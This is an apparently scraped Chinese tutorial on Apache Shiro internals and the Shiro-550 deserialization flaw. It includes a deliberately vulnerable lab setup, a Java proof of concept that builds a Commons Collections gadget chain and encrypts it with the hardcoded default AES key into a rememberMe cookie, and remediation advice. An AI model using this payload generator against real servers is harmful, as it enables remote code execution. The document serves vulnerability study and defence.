Apache Shiro 安全漏洞分析与教学文档<\/h1>

1. Shiro 核心架构解析<\/h2>

1.1 核心组件关系<\/h3>

FilterChainResolver<\/strong>：负责解析请求路径并匹配对应的过滤器链<\/li>
PathMatchingFilterChainResolver<\/strong>：实现类，将FilterChainManager设置进去<\/li>

SpringShiroFilter<\/strong>：核心过滤器，继承OncePerRequestFilter

封装request\/response为ShiroHttpServletRequest\/ShiroHttpServletResponse<\/li>
实现HttpServletRequest\/HttpServletResponse接口<\/li> <\/ul> <\/li> <\/ul>
1.2 认证流程<\/h3>

Subject创建流程<\/strong>：<\/p>

WebSubject.Builder<\/code>构建SubjectContext<\/li>
SubjectContext是一个Map，包含： SecurityManager<\/li> ShiroServletRequest<\/li> ShiroServletResponse<\/li> 当前HTTP请求状态<\/li> <\/ul> <\/li> <\/ul> <\/li> 认证检查顺序<\/strong>：<\/p> 首先检查SESSION中是否存在用户信息<\/li> 如果SESSION不存在或无效，则通过RememberMe组件反序列化用户信息<\/li> <\/ul> <\/li> Subject执行<\/strong>：<\/p> WebDelegatingSubject<\/code>执行SubjectCallable<\/code><\/li> 将Subject与线程绑定<\/li> 匹配URI与FilterChainManager中的配置<\/li> <\/ul> <\/li> <\/ol> 1.3 过滤器链执行<\/h3> 匹配流程<\/strong>：<\/p> 获取当前URI<\/li> 与FilterChainManager中的URI逐步匹配<\/li> 匹配成功后调用filterChainManager.proxy()<\/code><\/li> <\/ul> <\/li> 过滤器示例<\/strong>：<\/p> AnonymousFilter<\/code>(anon)：直接返回true，允许所有访问<\/li> LogoutFilter<\/code>(logout)：调用subject.logout()<\/code>清空状态<\/li> UserFilter<\/code>：在父类中定义复杂逻辑<\/li> <\/ul> <\/li> <\/ul> 2. 环境搭建指南<\/h2> 2.1 SpringMVC环境配置<\/h3> Maven依赖<\/strong>：<\/p> <dependencies><\/span> <\/span><\/span> <\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>junit<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>junit<\/artifactId><\/span> <\/span><\/span> <version><\/span>4.11<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.springframework<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>spring-webmvc<\/artifactId><\/span> <\/span><\/span> <version><\/span>5.3.8<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <\/span><\/span> <\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.apache.shiro<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>shiro-spring<\/artifactId><\/span> <\/span><\/span> <version><\/span>1.2.3<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <\/span><\/span> <\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>commons-collections<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-collections<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.2.1<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span><\/code><\/pre>web.xml配置<\/strong>：<\/p> <filter><\/span> <\/span><\/span> <filter-name><\/span>shiroFilter<\/filter-name><\/span> <\/span><\/span> <filter-class><\/span>org.springframework.web.filter.DelegatingFilterProxy<\/filter-class><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>targetFilterLifecycle<\/param-name><\/span> <\/span><\/span> <param-value><\/span>true<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span><\/filter><\/span> <\/span><\/span><filter-mapping><\/span> <\/span><\/span> <filter-name><\/span>shiroFilter<\/filter-name><\/span> <\/span><\/span> <url-pattern><\/span>\/*<\/url-pattern><\/span> <\/span><\/span><\/filter-mapping><\/span> <\/span><\/span><\/code><\/pre>ApplicationContext.xml配置<\/strong>：<\/p> <bean<\/span> id=<\/span>"defaultWebSecurityManager"<\/span> class=<\/span>"org.apache.shiro.web.mgt.DefaultWebSecurityManager"<\/span>><\/span> <\/span><\/span> <property<\/span> name=<\/span>"rememberMeManager"<\/span>><\/span> <\/span><\/span> <bean<\/span> class=<\/span>"org.apache.shiro.web.mgt.CookieRememberMeManager"<\/span>><\/span> <\/span><\/span> <property<\/span> name=<\/span>"cookie"<\/span>><\/span> <\/span><\/span> <bean<\/span> class=<\/span>"org.apache.shiro.web.servlet.SimpleCookie"<\/span>><\/span> <\/span><\/span> <property<\/span> name=<\/span>"name"<\/span> value=<\/span>"rememberMe"<\/span>\/><\/span> <\/span><\/span> <property<\/span> name=<\/span>"maxAge"<\/span> value=<\/span>"60"<\/span>\/><\/span> <\/span><\/span> <\/bean><\/span> <\/span><\/span> <\/property><\/span> <\/span><\/span> <\/bean><\/span> <\/span><\/span> <\/property><\/span> <\/span><\/span> <property<\/span> name=<\/span>"realm"<\/span>><\/span> <\/span><\/span> <bean<\/span> class=<\/span>"com.heihu577.realm.MyRealm"<\/span>\/><\/span> <\/span><\/span> <\/property><\/span> <\/span><\/span><\/bean><\/span> <\/span><\/span> <\/span><\/span><bean<\/span> id=<\/span>"shiroFilter"<\/span> class=<\/span>"org.apache.shiro.spring.web.ShiroFilterFactoryBean"<\/span>><\/span> <\/span><\/span> <property<\/span> name=<\/span>"filterChainDefinitionMap"<\/span>><\/span> <\/span><\/span> <map><\/span> <\/span><\/span> <entry<\/span> key=<\/span>"\/index"<\/span> value=<\/span>"user"<\/span>\/><\/span> <\/span><\/span> <entry<\/span> key=<\/span>"\/login"<\/span> value=<\/span>"anon"<\/span>\/><\/span> <\/span><\/span> <entry<\/span> key=<\/span>"\/user\/login"<\/span> value=<\/span>"anon"<\/span>\/><\/span> <\/span><\/span> <entry<\/span> key=<\/span>"\/**"<\/span> value=<\/span>"authc"<\/span>\/><\/span> <\/span><\/span> <\/map><\/span> <\/span><\/span> <\/property><\/span> <\/span><\/span> <property<\/span> name=<\/span>"securityManager"<\/span> ref=<\/span>"defaultWebSecurityManager"<\/span>\/><\/span> <\/span><\/span><\/bean><\/span> <\/span><\/span><\/code><\/pre>2.2 自定义Realm示例<\/h3> public<\/span> class<\/span> MyRealm<\/span> extends<\/span> AuthorizingRealm {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> String getName<\/span>()<\/span> {<\/span> <\/span><\/span> return<\/span> "myRealm"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> protected<\/span> AuthorizationInfo doGetAuthorizationInfo<\/span>(<\/span>PrincipalCollection principals)<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> protected<\/span> AuthenticationInfo doGetAuthenticationInfo<\/span>(<\/span>AuthenticationToken token)<\/span> {<\/span> <\/span><\/span> UsernamePasswordToken upToken =<\/span> (<\/span>UsernamePasswordToken)<\/span> token;<\/span> <\/span><\/span> String username =<\/span> upToken.<\/span>getUsername<\/span>();<\/span> <\/span><\/span> return<\/span> new<\/span> SimpleAuthenticationInfo(<\/span>username,<\/span> "heihu577"<\/span>,<\/span> getName());<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. Shiro-550漏洞深度分析<\/h2> 3.1 漏洞条件<\/h3> Shiro版本 < 1.2.4<\/li> 启用了RememberMe功能<\/li> 存在可利用的反序列化链(如commons-collections)<\/li> <\/ul> 3.2 漏洞原理<\/h3> RememberMe处理流程<\/strong>：<\/p> 获取Cookie中的rememberMe值<\/li> Base64解码<\/li> 使用AES解密(密钥硬编码)<\/li> 反序列化解密后的数据<\/li> <\/ul> <\/li> 关键问题<\/strong>：<\/p> AES加密使用默认密钥kPH+bIxk5D2deZiIxcaaaA==<\/code><\/li> 攻击者可伪造加密数据<\/li> <\/ul> <\/li> <\/ol> 3.3 漏洞利用POC<\/h3> public<\/span> class<\/span> MyExp01<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> AesCipherService aesCipherService =<\/span> new<\/span> AesCipherService();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造恶意TemplatesImpl <\/span><\/span><\/span><\/span> TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span> <\/span><\/span> Field bytecodes =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span> <\/span><\/span> Field name =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span> <\/span><\/span> name.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> bytecodes.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 设置恶意字节码 <\/span><\/span><\/span><\/span> byte<\/span>[][]<\/span> myBytes =<\/span> new<\/span> byte<\/span>[<\/span>1<\/span>][];<\/span> <\/span><\/span> myBytes[<\/span>0<\/span>]<\/span> =<\/span> new<\/span> BASE64Decoder().<\/span>decodeBuffer<\/span>(<\/span>"恶意类Base64"<\/span>);<\/span> <\/span><\/span> bytecodes.<\/span>set<\/span>(<\/span>templates,<\/span> myBytes);<\/span> <\/span><\/span> name.<\/span>set<\/span>(<\/span>templates,<\/span> ""<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造CC链 <\/span><\/span><\/span><\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InstantiateTransformer(<\/span>new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>templates})<\/span> <\/span><\/span> });<\/span> <\/span><\/span> <\/span><\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span> LazyMap lazyMap =<\/span> (<\/span>LazyMap)<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> chainedTransformer);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 生成最终payload <\/span><\/span><\/span><\/span> TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "heihu577"<\/span>);<\/span> <\/span><\/span> HashMap<<\/span>TiedMapEntry,<\/span> Object><\/span> hsMap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span> hsMap.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span> "value"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 序列化并加密 <\/span><\/span><\/span><\/span> ByteArrayOutputStream bos =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>bos);<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>hsMap);<\/span> <\/span><\/span> oos.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span> byte<\/span>[]<\/span> encrypted =<\/span> aesCipherService.<\/span>encrypt<\/span>(<\/span>bos.<\/span>toByteArray<\/span>(),<\/span> <\/span><\/span> Base64.<\/span>decode<\/span>(<\/span>"kPH+bIxk5D2deZiIxcaaaA=="<\/span>)).<\/span>getBytes<\/span>();<\/span> <\/span><\/span> <\/span><\/span> String rememberMe =<\/span> Base64.<\/span>encodeToString<\/span>(<\/span>encrypted);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"rememberMe="<\/span> +<\/span> rememberMe);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.4 漏洞修复方案<\/h3> 升级Shiro到1.2.4及以上版本<\/li> 自定义RememberMe加密密钥： CookieRememberMeManager rememberMeManager =<\/span> new<\/span> CookieRememberMeManager();<\/span> <\/span><\/span>rememberMeManager.<\/span>setCipherKey<\/span>(<\/span>Base64.<\/span>decode<\/span>(<\/span>"自定义密钥"<\/span>));<\/span> <\/span><\/span>securityManager.<\/span>setRememberMeManager<\/span>(<\/span>rememberMeManager);<\/span> <\/span><\/span><\/code><\/pre><\/li> 禁用RememberMe功能(如不需要)<\/li> <\/ol> 4. DelegatingFilterProxy机制解析<\/h2> 4.1 核心作用<\/h3> 在Spring MVC环境中桥接传统Filter与Spring Bean<\/li> 解决Tomcat注册Filter在Spring容器初始化之前的问题<\/li> <\/ul> 4.2 关键方法<\/h3> init<\/strong>:<\/p> 初始化targetFilterLifecycle<\/code>配置<\/li> 保存filterConfig<\/code>和targetBeanName<\/code><\/li> <\/ul> <\/li> doFilter<\/strong>:<\/p> 获取Spring容器中的Filter Bean<\/li> 根据配置调用目标Filter的init方法<\/li> 委托调用目标Filter的doFilter方法<\/li> <\/ul> <\/li> <\/ol> 4.3 与SpringBoot区别<\/h3> SpringBoot使用FilterRegistrationBean<\/code>自动注册Filter<\/li> Spring MVC需要手动配置DelegatingFilterProxy<\/code><\/li> <\/ul> 5. 防御建议<\/h2> 及时升级<\/strong>：保持Shiro最新版本<\/li> 密钥管理<\/strong>：避免使用默认密钥<\/li> 定期轮换密钥<\/li> <\/ul> <\/li> 反序列化防护<\/strong>：使用SerializationWhitelist<\/code><\/li> 限制反序列化类<\/li> <\/ul> <\/li> 最小权限<\/strong>：Realm实现遵循最小权限原则<\/li> 监控审计<\/strong>：记录异常认证尝试<\/li> <\/ol> 6. 扩展知识<\/h2> 其他Shiro漏洞<\/strong>：<\/p> Shiro-721(Padding Oracle漏洞)<\/li> 权限绕过漏洞(CVE-2020-13933)<\/li> <\/ul> <\/li> 安全开发建议<\/strong>：<\/p> 避免在RememberMe中存储敏感信息<\/li> 自定义Filter时注意安全边界<\/li> 定期安全审计<\/li> <\/ul> <\/li> 调试技巧<\/strong>：<\/p> 关键断点： AbstractShiroFilter.doFilterInternal<\/code><\/li> DefaultSecurityManager.resolvePrincipals<\/code><\/li> CookieRememberMeManager.getRememberedPrincipals<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol>